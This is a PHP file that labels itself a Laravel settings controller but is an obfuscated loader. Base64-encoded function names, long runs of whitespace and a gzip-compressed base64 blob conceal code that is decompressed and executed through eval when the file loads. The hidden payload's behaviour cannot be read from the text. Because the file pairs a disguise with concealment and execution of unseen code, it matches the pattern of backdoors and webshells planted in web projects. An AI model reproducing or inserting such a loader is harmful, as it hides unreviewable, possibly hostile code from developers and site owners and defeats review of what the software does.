<?php 
        $__='printf';$_='Loading app/Http/Controllers/Pengaturan/AplikasiController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
